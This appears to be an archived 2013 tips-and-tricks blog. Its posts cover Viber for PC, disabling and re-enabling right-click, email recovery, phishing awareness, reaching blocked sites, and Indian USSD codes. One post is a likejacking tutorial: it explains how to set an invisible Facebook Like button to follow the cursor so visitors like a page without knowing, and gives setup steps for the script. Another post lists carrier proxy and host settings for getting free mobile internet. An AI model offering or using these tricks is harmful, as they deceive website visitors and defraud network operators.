Friday, 31 May 2013

Viber For PC Free Download and settings

Viber is the most popular application to make free calls and send text mesages on mobile devices. Earlier it was limited to mobile devices only, but now the Viber application for all the platforms have got a massive update and is now available for desktops for Windows and Macintosh users.
A Little Bit of History
Earlier I used Viber on PC with the help of Android Emulators, like we do it for WhatsApp, as there was no standalone Viber app for PC then. But now Viber application for PC has been officially launched and can be used in addition to using Viber on smartphones.
Viber for PC
You need to have Viber installed on your phone in order to use Viber on PC. Installing it is easy, just download the Viber app from the official site and install it. Now you need to enter your phone number in the Viber app on PC and you will get a message in the Viber app on your phone with the activation code. This needs to be entered into the desktop app for verification.
After successful verification, Viber will start loading your contacts on the PC application. You can then message any of your contact, create an audio or make video calls from your PC itself.

The history tab shows you the sent and received messages from both phone and the Viber PC application. Make note that it only displays the image and text messages and not the audio or video clips as of now.
The Viber PC app also provides some basic settings like it allows you to change the input and output volume.

Viber for PC also allows you to transfer calls between your mobile phone and PC like if you are talking through the Viber application for PC and you have to go out, then you can easily transfer the ongoing call from PC to your phone with the newly added “Transfer Call” button.


Viber stays in the taskbar and runs continuously. This allows Viber to notify you of incoming calls and messages.
VERDICT
In all Viber has been quite famous on mobile platforms for making free calls and text messages, but we already had Skype for this purpose on PC. But Viber for PC adds the live call transfer feature which is a nice addition that Skype does not offer.

Thursday, 30 May 2013

How To Disable Right Click On Your Website Or Blog




If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.

How To Disable Right Click On Your Blog ?


 1. Got to your bloggeDashboard and then Click on Layout.



 2. Now Click on Add Gadget and select Html/Javascript.



 3. Now paste code given below in the pop up window.

<!--MBW Code-->
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!--Code End http://www.tricks4web.com>


4. Save it and done. Now users will not be able to right click on your website.

Monday, 27 May 2013

Clickjacking or facebook likes generation trick

 What is Clickjacking?




Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view. In this situation what happens is that You think that you are clicking on a standard button or link, like the PLAY button or download button on an video or some stuff, but you are really clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no idea what you’re really doing. You could be downloading malware or making all your Facebook information public without realizing it. Some good hackers make ajax keyloggers and put them as javascripts over their fake websites and when you open them they retrieve all your passwords stored in web browser and records whatever you type while the web browser is open and stores this information on their servers.

There are several types of clickjacking but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or hacker might trick you by saying that you like a product you’ve never heard. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed for liking Mark Zukenberg
, the world isnt likely to end. But you may be helping to spread spam or possibly sending Friends somewhere that contains malware.




How It Work ?

The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked.First download the JavaScript from the below download link.

CLICK HERE  <--


After downloading the script extract all the files.Now modify the config.js and follow the below instructions.

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore. 
"time" if set to 0 will make it stay forever(which is usually not preferred).

3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible

Properly set the var in the file if it is jumbled ?

After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website.

How To Run The Script ?

1. Add config.js just above head tag in your pages
------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
------------------------------------------------------------------------------------------------------------

2. Add like.js after body tag in your pages
------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/like.js"> </script>
------------------------------------------------------------------------------------------------------------

Remove src link with your uploaded link.

5. That's it. The script is ready to go.

ENJOY(-_-)

Thursday, 23 May 2013

Network Hacking Tricks for free internet in all major networks

Reliance Users :::
1. Here is the trick for reliance in default browser(surf download).
Just make this setting
ip- 173.0.52.162or 85.214.103.122
port-80
apn- rcomnet
h.p.- 0.facebook.com
now open homepage
tnx.enjoy
2.
Its a trick for opera highspeed browsing not for download.use ur internet profile manually like this below
proxy address
10.0.0.172:80/
Use any handler with server4.opera and something.other server won't work.exellent speed in surfing.
Airtel Users :::
1.
Here is 100% working Big file download proxy for airtel.
Just create new setting
Proxy:
screwthesystem.com
Or
Schoolproxy2012.Info
Port: 80
Hp: fb.Me
or 59.160.229.40or any free site.
Enjoy
2.
Here is 100% working Big file download proxy for airtel.
Just create new setting
Proxy:
airtelgprs.com
Port: 80
Hp: fb.Me
or 59.160.229.40or any free site.
Enjoy
3.
airtel newest trick
>Download latest handler.
>Select proxy type as Host or Real host
>Put this in proxy server
125.21.241.77

Monday, 20 May 2013

ENABLE RIGHT CLICK OPTION ON RIGHT CLICK DISABLE SITES


Several web sites turn off the ability of right-click on there pages.  Web administrators are using this to protecting their web pages from unauthorized copying. This is very common in past, but still there are lots of sites using this to protect copying there content by others. They use simple JavaScript to disable the ability of right-clicking on there web pages. Here I’m going to show you a very simple way to turn this function ON.

HOW TO RECOVER HACKED EMAIL ACCOUNT?


It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.

FOR GMAIL:

It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.
Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link
If you cannot find success from the Step-1 then proceed to Step-2.
Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like
1. Email addresses of up to five frequently emailed contacts
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…
You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link

FOR YAHOO AND HOTMAIL:

Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option. 
To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.

HOW TO IDENTIFY PHISHING SCAMS!


What is Phishing?

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.


What does a phishing scam look like?


Phishing e-mail messages take a number of forms. They might appear to come from your bank or financial institution, a company you regularly do business with, such as Microsoft, or from your social networking site.


 The following is an example of what a phishing scam in an e-mail message might look like.



Example of a phishing e-mail message, which includes a deceptive Web address that links to a scam Web site.
Here are a few phrases to look for if you think an e-mail message is a phishing scam.

1.Verify or update your account:

Businesses should not ask you to send passwords, login names, Social Security numbers, or other personal information through e-mail.



2.you have won a prize or lottery:
The lottery scam is a common phishing scam known as advanced fee fraud. One of the most common forms of advanced fee fraud is a message that claims that you have won a large sum of money, or that a person will pay you a large sum of money for little or no work on your part



“3.If you don’t respond within 48 hours, your account will be closed.”
These messages convey a sense of urgency so that you’ll respond immediately without thinking.



Tips to protect yourselves from phishing:


1. Don’t reply to, or click links within, emails that ask for personal, financial, or account information.
2. Check the message hea
ders. The ‘From:’ address and the ‘Return-path’ should reference the same source. If necessary, look at the expanded header as some phishing use vulnerable email servers to rout their messages.
3. Instead of clicking the links in emails, go to the websites directly by typing the web address into your browser, cut and paste, or use bookmarks.
4. If on a secure page, look for “https” at the beginning of the URL and the padlock icon in the browser.
5. Use a browser that has a phishing filter (Firefox, Internet Explorer, or Opera).

6. If you ever need to change your account information, such as your billing details or your password, you should always sign in to your account from the main login page of your trusted network (i.e. your bank’s main website) and make the changes directly within your account.

HOW TO OPEN AND ACCESS BLOCKED SITES IN INDIA


Airtel And Reliance Internet Service Providers Blocked Some Torrent And Other Sites In India Since 16th May. They Blocked Majority Of Popular Torrent Sites And Other Popular Sites Which Are Leading Sites And Has Many Visitors From India.
The Reason Behind This Sites Blocked Is A Court Ban, Following John Doe Order Taken By Copyright Labs, Chennai To Prevent Piracy Of Tamil Films : Dhammu (Tamil) and 3 (Telugu).
Upon Visiting Any Of Website Lister Below Airtel Or Reliance Costumers Get Any Of Following Message “Access to this site has been blocked as per Court Orders” Or ”This website/URL has been blocked until further notice either pursuant to Court orders or on the Directions issued by the Department of Telecommunications”. This Ban Seems To Region Specific As Some Users Are Able To Access This Blocked Sites In India From The Mentioned ISP’s.

List Of The Sites Blocked In India
Vimeo.com
Dailymotion.com
Xmarks.com
Pastebin.com
Torrent Sites :
Isohunt.com
Thepiratebay.org | Thepiratebay.se
Torrentz.eu
Kat.ph
Torlock.com
Kickasstorrents.com
Extratorrent.com
Torrentfunk.com
Fenopy.eu
And Many More…
How To Open And Access Blocked Sites :
Many People Uses Proxies And VPN’s To Access This Sites. But It’s Not The Easy Option Nor Suitable For Everyone.
So Here Are Simple Hack To Access This Sites Easily.
By Placing https Instead Of http You Can Access Any Of The Blocked Sites.
As Example :
Use https://vimeo.com Instead Of http://vimeo.com
https://xmarks.com
https://isohunt.com
https://kat.ph
https://torrentz.eu
https://thepiratebay.se

Saturday, 18 May 2013

IDEA USSD Codes


Idea is one of the leading telecom service in India accounting 16% of total mobile connections. Idea has most attractive services with cheap rates. Idea has many USSD codes for starting new Value Added Services and also to see the remaining balance of these services. But it’s quite hard to find the Idea USSD Codes. So to make it easy for Idea users I am listing here all the codes I could find.
List Of All The Idea USSD Codes :
Dial / SMSCodeDescription
Dial*121#To check main balance
Dial*123#Subscribe to Value Added Services
( Cricket score, Maa laxmi pics, Ambe 
maa aarti )
Dial*125#GPRS Data Details
Dial*130*RECHARGECODE#To recharge your mobile number
( RECHARGECODE = Coupon Code )
Dial*130#To check balance
Dial*131*3#Details on Voice and SMS packs
( Main Balance, STD Minutes and Discounted 
SMS )
Dial*147#Idea Self Care
( Recharge Information, Account Information,
3G & 2G Services, VAS )
Dial*150#Special Offers For Your Number
Dial*369#Idea Local Minutes Pack
Dial*456#All Packs at Rs 30 per month
( Cricket Scores, Youth Pack, Love Shayri )
Dial12345Customer care Number
Dial155223VAS Deactivation Portal
( To Deactivate VAS Services)
SMSSTART 0 to 1909Activate DO NOT DISTURB Service

NOTE

All these codes are working at the time of writing this article. All these codes were tested in Delhi-NCR region on Idea network. These codes will also work in most states across India. If you find any working code for Idea, other than the ones listed above, drop it in comments, I will append the list as soon as possible.

Special Offer

We have our website hosted at Hostgator, the best hosting service provider we have seen so far. We have seen 0% downtime with HostGator and it just costs $3.96 a month. You can also use our coupon code "T4WMEGAOFFER" and get additional 25% discount on any hosting packages. Sign Up With Hostgator Today !